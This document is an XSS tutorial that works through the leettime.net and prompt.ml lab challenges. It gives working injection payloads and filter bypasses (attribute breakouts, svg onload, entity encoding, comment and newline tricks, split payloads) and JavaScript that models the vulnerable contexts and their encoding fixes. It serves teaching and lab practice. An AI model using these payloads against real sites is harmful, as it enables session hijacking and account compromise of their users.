XSS Cross Site Scripting

XSS Vulns - Cross Site Scripting

  • Allows an attacker to inject JavaScript code into a page served by the vulnerable site.
  • The injected code runs when the victim loads the page (or, for event-handler payloads, when the victim interacts with the injected element).
  • The code runs in the victim's browser, not on the server, so it gets whatever that browser has: the session, the DOM, and requests made to the site.

Three main types of XSS Cross Site Scripting

  1. Persistent/stored XSS
  2. Reflected XSS
  3. DOM based XSS




Basic XSS: the input is reflected somewhere in the page and the payload has to break out of that spot. leettime.net hosts a basic XSS lab with 8 challenges; each one reflects the parameter in a different context, so the breakout string changes from challenge to challenge.
Cross site scripting on Lab
Lab Link - http://leettime.net/xsslab1/
 
Challenge 1:

The input is reflected straight into the page body, so the browser parses it as HTML and the script runs as-is:

<script>alert(1)</script>

Challenge 2:

JavaScript can be placed anywhere the HTML parser lets a tag start. Here the input is reflected as an unquoted attribute value:

<input type="text" name="name" value=batman></input>

Dropping the script tag straight in does not work: the unquoted value swallows <script up to the first >, and what is left is plain text:

<input type="text" name="name" value=<script>alert(1)</script>></input>

An unquoted value ends at the first > or whitespace, so a leading > closes the input tag and everything after it is parsed as new HTML:

<input type="text" name="name" value=>batman></input>

payload = ><script>alert(1)</script>
 
 
Challenge 3:

The value is now double-quoted, so the quote has to be closed before the tag can be:

<input type="text" name="name" value="spiderman"></input>

payload = "><script>alert(1)</script>

Challenge 4:

Same thing with a single-quoted value, so the breakout starts with a single quote:

<input type="text" name="name" value='ironman'></input>

payload = '><script>alert(1)</script>
 
Challenge 5:

The input lands inside a JavaScript string in an inline script:

<center><script>var search_str="hello";</script>

The HTML parser ends a script element at the first </script> it sees, whatever the JavaScript quoting around it, so close the script and open a new one:

payload = </script><script>alert(1)</script>

Challenge 6: <center><script>var search_str='hello';</script>

Single-quoted JavaScript string this time. The quote style does not matter for the </script> trick, so both of these work (the leading '; is optional):

payload = ';</script><script>alert(1)</script>

payload2 = </script><script>alert(1)</script>
 
Challenge 7:

The script tag no longer gets through: the reflected value is treated as a string and the payload stays inside the attribute. Instead of opening a new tag, stay inside the existing one and add an event handler that fires when the mouse moves over the field:

onmouseover=alert(1);

'onmouseover='alert(1);

The quote in front has to match the one around the attribute. Once the attribute value is closed, onmouseover lands as its own attribute on the tag and the JavaScript runs on hover:

"onmouseover="alert(1);
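The contexts above (page body, unquoted, double- and single-quoted attribute, JavaScript string, and an attribute where angle brackets do not get through) are the whole story of the leettime lab. The following is an added example, not the lab's code or part of the original notes: it models each reflection point as a template, renders the breakout payload into it, renders the same payload through the encoding that would have prevented it, and runs a small HTML tokenizer over the result to show what a browser would actually execute. The templates, the assumption that challenge 7 strips < and >, and all function names are this example's own.

```javascript
// Added example, not the lab's code: reconstructed reflection points for leettime
// xsslab1 challenges 1-7 (the templates are assumptions), the breakout payload for
// each, the context-aware encoding that closes the hole, and a small HTML tokenizer.

const CONTEXTS = {
  // challenge 1: reflected straight into the page body
  body: { kind: 'html', payload: '<script>alert(1)</script>', tpl: x => `<div>${x}</div>` },
  // challenge 2: unquoted attribute value, a leading > ends the tag; encoding alone
  // does not fix this one, the safe template must also quote the value
  attrUnquoted: { kind: 'html', payload: '><script>alert(1)</script>',
    tpl: x => `<input type="text" name="name" value=${x}>`,
    safeTpl: x => `<input type="text" name="name" value="${x}">` },
  // challenges 3 / 4: double- and single-quoted attribute values
  attrDouble: { kind: 'html', payload: '"><script>alert(1)</script>',
    tpl: x => `<input type="text" name="name" value="${x}">` },
  attrSingle: { kind: 'html', payload: "'><script>alert(1)</script>",
    tpl: x => `<input type="text" name="name" value='${x}'>` },
  // challenges 5 / 6: inside a JS string literal; the HTML parser ends the script
  // element at the first </script> whatever the JS quoting says
  jsString: { kind: 'js', payload: '</script><script>alert(1)</script>',
    tpl: x => `<script>var search_str="${x}";</script>` },
  // challenge 7: assumed that < and > are stripped, so add an event handler instead
  attrNoAngle: { kind: 'html', payload: '"onmouseover="alert(1)',
    tpl: x => `<input type="text" name="name" value="${x.replace(/[<>]/g, '')}">` },
};

// Encoding for HTML text and quoted attribute values.
function encodeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, ch => map[ch]);
}

// Encoding for data inside a JS string literal: JSON.stringify handles quotes and
// backslashes; escaping < too means "</script>" can never appear in the literal.
function encodeJsString(s) {
  return JSON.stringify(s).slice(1, -1).replace(/</g, '\\u003c');
}

function renderUnsafe(name) {
  const c = CONTEXTS[name];
  return c.tpl(c.payload);
}

function renderSafe(name) {
  const c = CONTEXTS[name];
  const enc = c.kind === 'js' ? encodeJsString : encodeHtml;
  return (c.safeTpl || c.tpl)(enc(c.payload));
}

// Minimal HTML tokenizer, close enough to the spec's quoting rules to show how a
// browser slices the output: returns <script> bodies and on* attribute names.
function findExecutable(html) {
  const found = { scripts: [], handlers: [] };
  const ws = ch => /\s/.test(ch);
  let i = 0;
  while (i < html.length) {
    if (html[i] !== '<') { i++; continue; }
    const m = /^<(\/?)([a-zA-Z][^\s\/>]*)/.exec(html.slice(i));
    if (!m) { i++; continue; }                        // a lone < is just text
    const closing = m[1] === '/';
    const tag = m[2].toLowerCase();
    i += m[0].length;
    while (i < html.length && html[i] !== '>') {      // attribute loop
      if (ws(html[i]) || html[i] === '/') { i++; continue; }
      let name = '';
      while (i < html.length && !ws(html[i]) && !'/>='.includes(html[i])) name += html[i++];
      while (i < html.length && ws(html[i])) i++;
      if (html[i] === '=') {
        i++;
        while (i < html.length && ws(html[i])) i++;
        const q = html[i];
        if (q === '"' || q === "'") {                 // quoted: runs to the matching quote
          const end = html.indexOf(q, i + 1);
          i = end === -1 ? html.length : end + 1;
        } else {                                      // unquoted: runs to whitespace or >
          while (i < html.length && !ws(html[i]) && html[i] !== '>') i++;
        }
      }
      if (!closing && /^on./i.test(name)) found.handlers.push(name.toLowerCase());
    }
    i++;                                              // consume the >
    if (tag === 'script' && !closing) {               // raw text up to the first </script
      const end = html.toLowerCase().indexOf('</script', i);
      found.scripts.push(html.slice(i, end === -1 ? html.length : end).trim());
      i = end === -1 ? html.length : end;
    }
  }
  return found;
}

// Does the rendered page run the injected alert(1), as a script or as a handler?
function executes(html) {
  const f = findExecutable(html);
  return f.scripts.includes('alert(1)') || f.handlers.length > 0;
}
```

For every context, executes(renderUnsafe(name)) is true and executes(renderSafe(name)) is false. The tokenizer is deliberately the interesting part: it is why challenge 2 falls to a bare > (an unquoted value ends there), why challenge 7's "onmouseover=" becomes a second attribute (the tokenizer starts a new attribute name right after a closing quote), and why the JS-string context cannot be fixed with HTML encoding alone, since the script element ends at the first </script> regardless of what the JavaScript around it says.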
 

Manual building XSS Vector

Lab Link – https://prompt.ml/0

prompt.ml checks for a call to prompt(1); the notes below keep alert(1) as in the leettime lab, so swap in prompt(1) when submitting. Each level shows the escape() function applied to your input, so read it first and then build the vector by hand.

Quick notes (each level is worked through in more detail further down):

Level 1:

<svg/onload=alert(1);

Whenever your input reflects as plain text because complete tags are stripped, use the svg vector without its closing >.

Level 2:

( – &#40;

( is filtered, so write it as the HTML entity &#40; inside <svg><script> ... </script>; the parser decodes the entity before the script runs. When something is filtered, converting it to its HTML encoding is often enough for the browser to decode and execute it directly.

Level 4:

Whenever they take a URL as the input field, try to point it at a file you control, e.g. test.js. A file loaded through a script src attribute must contain raw JavaScript (alert(1)), not a <script> tag.

Level 7:

A <p> tag reflects plain text, so an svg vector is needed, but only 12 characters of each #-separated segment are kept. On its own <svg/onload=alert(1) gets cut to <svg/onload=:

<p class="comment" title="<svg/onload="></p>

so the vector is split over three segments:

<svg/a=#"onload='/*#*/alert(1)'

Level A:

<script>hello</script>

alert(1)

Level F (15 characters per segment):

<p class="comment" title="hello" data-comment='{"id":0}'></p>

svg vector:

<svg><!--#--><script><!--#-->alert(1)<!--#--></script>

Challenges:

Level 0

Input some random words into the text field and look at the source below it: the hello string ends up inside an attribute that ends with ">, so the payload closes the value and the tag first and the script follows:

"><script>alert(1)</script>

The leading " ends the value attribute and the > ends the tag, so the script tag that follows is parsed as part of the page and runs.

Level 1

A payload in the text field is wrapped in an <article> tag and any complete tag (anything from < through >) is stripped, so a normal <script> tag never survives. Leave the tag unclosed instead: the stripping does not match it, and the browser closes it for you when it reaches the </article>. The SVG tag is the usual choice because it takes event handlers.

SVG is a language for describing 2D graphics in XML (Canvas, by contrast, draws 2D graphics on the fly with JavaScript). Because SVG is XML based, every element is available within the SVG DOM, and you can attach JavaScript event handlers to an element.

The onload event occurs when an object has been loaded.

onload is most often used within the <body> element to execute a script once a web page has completely loaded all content (including images, script files, CSS files, etc.). On an <svg> element it fires as soon as the element itself is parsed, which is what makes it a good XSS vector.

                USAGE:  <svg/onload=alert(1);

Level 2

https://www.w3schools.com/html/html_charset.asp

Whenever your input reflects as plain text but the ( needed for a call is filtered, use the svg vector with a script inside it and write the character as an HTML entity:

( – &#40;

Inside <svg>, the content of a <script> element is parsed like the rest of the markup, so the entity is decoded to ( before the script runs. The closing ) is not filtered and has to be there, otherwise the script is a syntax error:

USAGE: <svg><script>alert&#40;1)</script>

Level 3

*Note: the input is wrapped in an HTML comment, <!-- hello -->, and the normal comment terminator --> is filtered.

--!> is also accepted as a comment end by the HTML parser, and it does not contain the filtered sequence, so it closes the comment and the script that follows is live markup:

USAGE: --!><script>alert(1)</script>

Level 4

Whenever they take a URL as the input field, try to inject the payload through a file you control. This level only links scripts whose URL looks like it belongs to prompt.ml (the sample is http://prompt.ml/js/test.js), so the file has to be reachable under a URL that passes that check.

test.js (raw JavaScript, not a <script> tag, since it is loaded through a script src attribute)

USAGE: http://prompt.ml/js/test.js

Level 5

When something is filtered, you can often convert it to a form the filter misses and the browser still decodes and executes. Here the input lands in the value attribute of an <input> and > is filtered, so there is no closing the tag: stay inside it and turn the input itself into something that fires an event. type=image makes it an image input (the first type attribute wins over the type="text" that comes later), an empty src makes the image fail to load, and onerror runs the JavaScript:

Usage: hello"type=image src onerror="alert(1)

The level also filters event handler attributes by matching on...= with a regex; . does not match a line break, so putting a newline between onerror and = gets the handler past the filter while the HTML parser still reads it as one attribute.

Level 7

The word is reflected by a <p> tag as plain text, so an svg vector is needed for code to execute. The input is split on # and only the first 12 characters of each segment are kept, each in its own <p class="comment" title="..."></p>, so a single <svg/onload=alert(1) gets cut off.

The fix is to spread the vector across three segments and swallow the markup between them. The dummy attribute a=" absorbs the "></p><p class="comment" title=" that the page inserts between the first and second segment, and inside the onload handler the JavaScript comment /* ... */ absorbs the same junk between the second and third segment, so what the browser runs is alert(1):

USAGE: "><svg/a=#"onload='/*#*/alert(1)'

Level A

The input lands directly inside a <script> tag, so a bare expression is the payload:

alert(1)

Level F

<p class="comment" title="hello" data-comment='{"id":0}'></p>

Same shape as level 7 with 15 characters per segment (and * removed, so the /* */ trick is out). HTML comments do the swallowing instead: inside <svg>, a <script> element's content is parsed as markup, so the <!-- --> pairs that span the segment boundaries disappear and the remaining text joins up into alert(1):

<svg><!--#--><script><!--#-->alert(1)<!--#--></script>
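Most of the prompt.ml levels above come down to a regex or a length limit, and it helps to see exactly what each filter does to a payload before trying it in the browser. The following is an added example, not code from prompt.ml or from the original notes: each function is my reconstruction from memory of that level's escape() filter (the exact regexes are assumptions; the live site is authoritative), fed with the page's payloads and with the naive version each filter catches. alert(1) is kept as on this page; prompt.ml itself expects prompt(1).

```javascript
// Added example, not prompt.ml's code: my reconstruction from memory of the
// escape() filters in levels 1, 2, 3, 5, 7 and F (exact regexes are assumptions;
// the live site is authoritative). Each function returns the HTML the level would
// emit for an input, so you can see what survives a filter.

// Level 1: complete tags are stripped (an ExtJS-style regex), rest goes in <article>
function level1(input) {
  return '<article>' + input.replace(/<\/?[^>]+>/gi, '') + '</article>';
}

// Level 2: "=" and "(" are deleted, the rest is reflected as-is
function level2(input) {
  return input.replace(/[=(]/g, '');
}

// Level 3: "->" is replaced, then the input is wrapped in an HTML comment
function level3(input) {
  return '<!-- ' + input.replace(/->/g, '_') + ' -->';
}

// Level 5: ">", on...= handler attributes and "focus" are replaced
function level5(input) {
  return '<input value="' + input.replace(/>|on.+?=|focus/gi, '_') + '" type="text">';
}

// Level 7: split on "#", keep 12 characters per segment, one <p title> each
function level7(input) {
  return input.split('#')
    .map(t => '<p class="comment" title="' + t.slice(0, 12) + '"></p>')
    .join('\n');
}

// Level F: like level 7 but "*" is deleted, 15 characters, plus a data-comment attribute
function levelF(input) {
  return input.replace(/\*/g, '').split('#')
    .map((t, i) => '<p class="comment" title="' + t.slice(0, 15) +
                   '" data-comment=\'{"id":' + i + '}\'></p>')
    .join('\n');
}

// The page's payloads (ASCII quotes) next to the naive version each filter catches.
const PAYLOADS = {
  level1: { works: '<svg/onload=alert(1)',                naive: '<script>alert(1)</script>' },
  level2: { works: '<svg><script>alert&#40;1)</script>',  naive: '<script>alert(1)</script>' },
  level3: { works: '--!><script>alert(1)</script>',       naive: '--><script>alert(1)</script>' },
  // the newline is the whole trick: "." in on.+?= does not match it
  level5: { works: '"type=image src onerror\n="alert(1)', naive: '"type=image src onerror="alert(1)' },
};
const FILTERS = { level1, level2, level3, level5 };

// true when the filter reflected the payload without mangling any of it
function survives(level, payload) {
  return FILTERS[level](payload).includes(payload);
}

function report() {
  const out = {};
  for (const level of Object.keys(PAYLOADS)) {
    out[level] = { works: survives(level, PAYLOADS[level].works),
                   naive: survives(level, PAYLOADS[level].naive) };
  }
  // the split-payload levels: look at what lands in each <p> title
  out.level7 = level7('"><svg/a=#"onload=\'/*#*/alert(1)\'').split('\n');
  out.levelF = levelF('<svg><!--#--><script><!--#-->alert(1)<!--#--></script>').split('\n');
  return out;
}

console.log(report());
```

report() shows the page's payload passing each filter untouched while the naive one is mangled (level 1 drops the <script> tags, level 2 leaves alert1), level 3 turns the --> into -_, level 5 turns onerror= into _), and for levels 7 and F it prints the three or four <p> lines so you can check by eye that every segment fit under the length limit; for level F the third segment, -->alert(1)<!--, is exactly 15 characters, which is why alert fits where a longer function name would be cut.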
